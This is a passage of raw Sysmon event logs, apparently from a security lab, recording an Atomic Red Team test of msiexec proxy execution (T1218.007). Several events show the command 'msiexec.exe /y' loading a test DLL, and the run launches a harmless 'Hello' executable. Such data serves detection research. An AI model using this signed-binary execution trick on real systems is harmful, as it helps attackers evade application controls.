"C:\AtomicRedTeam\atomics\T1218.007\src\MSIRunner.dll"WIN-HOST-MHAAG-\Administrator 734700x80000000000000002699080Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.131{7CF983DC-9829-62AC-4F6B-000000006202}1608C:\Windows\System32\msiexec.exeC:\AtomicRedTeam\atomics\T1218.007\src\MSIRunner.dll-----MD5=52E020CF3FCDD1357E769B95FB36072F,SHA256=6F2F3FE71A9673C8D9AD17517D51595182622CBD12FEEAEA93E313267CBE29BDfalse-UnavailableWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699079Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.131{7CF983DC-EE56-62A8-1500-000000006202}10483980C:\Windows\system32\svchost.exe{7CF983DC-9829-62AC-4F6B-000000006202}1608c:\windows\system32\msiexec.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699078Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.116{7CF983DC-EE56-62A8-1500-000000006202}10481096C:\Windows\system32\svchost.exe{7CF983DC-9829-62AC-4F6B-000000006202}1608c:\windows\system32\msiexec.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699077Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.116{7CF983DC-9829-62AC-4F6B-000000006202}1608C:\Windows\System32\msiexec.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699076Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.116{7CF983DC-9829-62AC-4F6B-000000006202}1608C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699075Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.116{7CF983DC-9829-62AC-4F6B-000000006202}1608C:\Windows\System32\msiexec.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699074Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.116{7CF983DC-9829-62AC-4F6B-000000006202}1608C:\Windows\System32\msiexec.exeC:\Windows\System32\ole32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=EB53D1BF6E1667C8727EBBB5D5A862ED,SHA256=2B3D48DFA43A284B1C66A8A98B0A48104133D86EEEB2E8E060BE2281CF476348trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699073Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.116{7CF983DC-9829-62AC-4F6B-000000006202}1608C:\Windows\System32\msiexec.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699072Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.116{7CF983DC-9829-62AC-4F6B-000000006202}1608C:\Windows\System32\msiexec.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699071Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.116{7CF983DC-9829-62AC-4F6B-000000006202}1608C:\Windows\System32\msiexec.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699070Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.116{7CF983DC-9829-62AC-4F6B-000000006202}1608C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc_os.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc_os.dllMD5=B80907BCF327C925E7AC990D81A705E6,SHA256=58A71BD4A0DDA6EAE49A50ABF92F73FD1792B218B7F811E06431CEF8EFF77040trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699069Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.116{7CF983DC-9829-62AC-4F6B-000000006202}1608C:\Windows\System32\msiexec.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699068Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.116{7CF983DC-9829-62AC-4F6B-000000006202}1608C:\Windows\System32\msiexec.exeC:\Windows\System32\winspool.drv10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=592EDD495F3F412C7E917CABE9B2A15E,SHA256=FC5D6EA6C14E6AA94ADE04D6D0C3AAAB8942864B118DE8219A712133DEF50550trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699067Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.116{7CF983DC-9829-62AC-4F6B-000000006202}1608C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc.dllMD5=22BEEEDFF247B8F90252646C91E775E5,SHA256=10F0FF6F6F21CCC3343BCBCC9B5158A95EC328C1C21F3B9482C688848B89E1DDtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699066Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.116{7CF983DC-9829-62AC-4F6B-000000006202}1608C:\Windows\System32\msiexec.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FADtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699065Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.116{7CF983DC-9829-62AC-4F6B-000000006202}1608C:\Windows\System32\msiexec.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=920CEBB474555470F1FFB129AD6E19D8,SHA256=DE1C8EA3EF80E7A0E42664559AF3B29FE89E29189382AFC0B438D9C21E2D909AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699064Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.116{7CF983DC-9829-62AC-4F6B-000000006202}1608C:\Windows\System32\msiexec.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699063Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.116{7CF983DC-9829-62AC-4F6B-000000006202}1608C:\Windows\System32\msiexec.exeC:\Windows\System32\combase.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=148F67CE7413EB2D4D777030DFCCD28B,SHA256=5CBD4E213A26B9D8BE56677946D294F65FC615D710F8E07909B643D437819161trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699062Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.116{7CF983DC-9829-62AC-4F6B-000000006202}1608C:\Windows\System32\msiexec.exeC:\Windows\System32\shlwapi.dll10.0.14393.5125 (rs1_release.220429-1732)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=407E895A220DE1A60C5B555A113FE998,SHA256=FE184347784F83953457146562E0F6C87C8DA04D0288415465631325A2A98C92trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699061Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.116{7CF983DC-9829-62AC-4F6B-000000006202}1608C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32full.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F284A98093B423946252259D7D2857D3,SHA256=193F70529B68EF108EA17ABC069E6DACF4541A547DF1D2F249F7555A58BCFA07trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699060Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.116{7CF983DC-9829-62AC-4F6B-000000006202}1608C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699059Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.116{7CF983DC-9829-62AC-4F6B-000000006202}1608C:\Windows\System32\msiexec.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699058Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.116{7CF983DC-9829-62AC-4F6B-000000006202}1608C:\Windows\System32\msiexec.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699057Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.116{7CF983DC-9829-62AC-4F6B-000000006202}1608C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699056Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.116{7CF983DC-9829-62AC-4F6B-000000006202}1608C:\Windows\System32\msiexec.exeC:\Windows\AppPatch\apppatch64\AcLayers.dll10.0.14393.2879 (rs1_release_inmarket.190313-1855)Windows Compatibility DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationACLAYERS.DLLMD5=18D8E2D6C17577D91A40C4A5AD9F6E37,SHA256=9E9CF9446EDA1F064E996F2022DBD3B3C7D6778574EA790B2B0412EA41C5F5F0trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699055Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.116{7CF983DC-9829-62AC-4F6B-000000006202}1608C:\Windows\System32\msiexec.exeC:\Windows\System32\apphelp.dll10.0.14393.4350 (rs1_release.210407-2154)Application Compatibility Client LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationApphelpMD5=92330FA0551BFFBB8C1C97E86F9A0264,SHA256=0F341AF375236EBF7047F6AE50F2834566F0D859F0F02B8A5FFD7F29C31B0117trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699054Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.116{7CF983DC-9829-62AC-4F6B-000000006202}1608C:\Windows\System32\msiexec.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484FtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699053Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.100{7CF983DC-9829-62AC-4F6B-000000006202}1608C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=92D599E644B89C0F9E7DDB55762EBEA6,SHA256=F32D28EE73EADAF9EF3F30145FA3C52B88DF47236B8747434750832BF1B9CDEEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699052Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.100{7CF983DC-9829-62AC-4F6B-000000006202}1608C:\Windows\System32\msiexec.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699051Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.100{7CF983DC-9829-62AC-4F6B-000000006202}1608C:\Windows\System32\msiexec.exeC:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699049Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.100{7CF983DC-EE97-62A8-7E00-000000006202}18083264C:\Windows\system32\csrss.exe{7CF983DC-9829-62AC-4F6B-000000006202}1608c:\windows\system32\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699048Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.100{7CF983DC-9829-62AC-4D6B-000000006202}33002248C:\Windows\SYSTEM32\cmd.exe{7CF983DC-9829-62AC-4F6B-000000006202}1608c:\windows\system32\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\SYSTEM32\cmd.exe+f1e1|C:\Windows\SYSTEM32\cmd.exe+11a37|C:\Windows\SYSTEM32\cmd.exe+cb0d|C:\Windows\SYSTEM32\cmd.exe+c295|C:\Windows\SYSTEM32\cmd.exe+f916|C:\Windows\SYSTEM32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791WIN-HOST-MHAAG-\AdministratorWIN-HOST-MHAAG-\Administrator 154100x80000000000000002699047Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.113{7CF983DC-9829-62AC-4F6B-000000006202}1608C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exec:\windows\system32\msiexec.exe /y "C:\AtomicRedTeam\atomics\T1218.007\src\MSIRunner.dll"C:\Users\ADMINI~1\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9{7CF983DC-9829-62AC-4D6B-000000006202}3300C:\Windows\System32\cmd.exe"cmd.exe" /c "c:\windows\system32\msiexec.exe /y "C:\AtomicRedTeam\atomics\T1218.007\src\MSIRunner.dll""WIN-HOST-MHAAG-\Administrator 154100x80000000000000002699012Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.094{7CF983DC-9829-62AC-4E6B-000000006202}4500C:\Windows\System32\conhost.exe10.0.14393.0 (rs1_release.160715-1616)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsWIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=D752C96401E2540A443C599154FC6FA9,SHA256=046F7A1B4DE67562547ED9A180A72F481FC41E803DE49A96D7D7C731964D53A0{7CF983DC-9829-62AC-4D6B-000000006202}3300C:\Windows\System32\cmd.exe"cmd.exe" /c "c:\windows\system32\msiexec.exe /y "C:\AtomicRedTeam\atomics\T1218.007\src\MSIRunner.dll""WIN-HOST-MHAAG-\Administrator 154100x80000000000000002699005Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.063{7CF983DC-9829-62AC-4D6B-000000006202}3300C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c "c:\windows\system32\msiexec.exe /y "C:\AtomicRedTeam\atomics\T1218.007\src\MSIRunner.dll""C:\Users\ADMINI~1\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{7CF983DC-EEA1-62A8-9500-000000006202}4692C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" WIN-HOST-MHAAG-\Administrator 12241200x80000000000000002698985Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteKey2022-06-17 15:05:12.975{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002698984Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:12.975{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\OwnerNT AUTHORITY\SYSTEM 12241200x80000000000000002698983Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:12.975{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SessionHashNT AUTHORITY\SYSTEM 12241200x80000000000000002698982Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:12.975{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SequenceNT AUTHORITY\SYSTEM 12241200x80000000000000002698981Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:12.975{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002698980Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:12.975{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002698979Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:12.975{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002698978Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:12.975{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002698977Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:12.975{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002698976Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:12.975{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 23542300x80000000000000002698975Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.975{7CF983DC-981D-62AC-1A6B-000000006202}4840NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f514a.msiMD5=3B5B5DC790399E957405F1ACF5E5C9CE,SHA256=656E2F62121A69A972DBFFBCC92E4440351467B0650148BE14226899DAA1B698falsetrue 23542300x80000000000000002698969Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.959{7CF983DC-981D-62AC-1A6B-000000006202}4840NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSI601C.tmpMD5=712BD86DBDB06FD26F245F24BEE2F999,SHA256=DA97C4B389579841D5627E0C06FF7B8452121DF34BA5453819F74F071157CC9Etruetrue 10341000x80000000000000002698873Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.897{7CF983DC-981D-62AC-1A6B-000000006202}48404868C:\Windows\system32\msiexec.exe{7CF983DC-9828-62AC-4B6B-000000006202}4016C:\Windows\Installer\MSI601C.tmp0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6f523|C:\Windows\System32\ADVAPI32.dll+189bf|C:\Windows\system32\Msi.dll+ec6fd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 154100x80000000000000002698872Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:12.902{7CF983DC-9828-62AC-4B6B-000000006202}4016C:\Windows\Installer\MSI601C.tmp0.0.0.0 --PrintArgs.exe"C:\Windows\Installer\MSI601C.tmp" "Hello, Atomic Red Team from an EXE!"C:\Windows\system32\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=712BD86DBDB06FD26F245F24BEE2F999,SHA256=DA97C4B389579841D5627E0C06FF7B8452121DF34BA5453819F74F071157CC9E{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\system32\msiexec.exe /VNT AUTHORITY\SYSTEM 10341000x80000000000000002698871Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 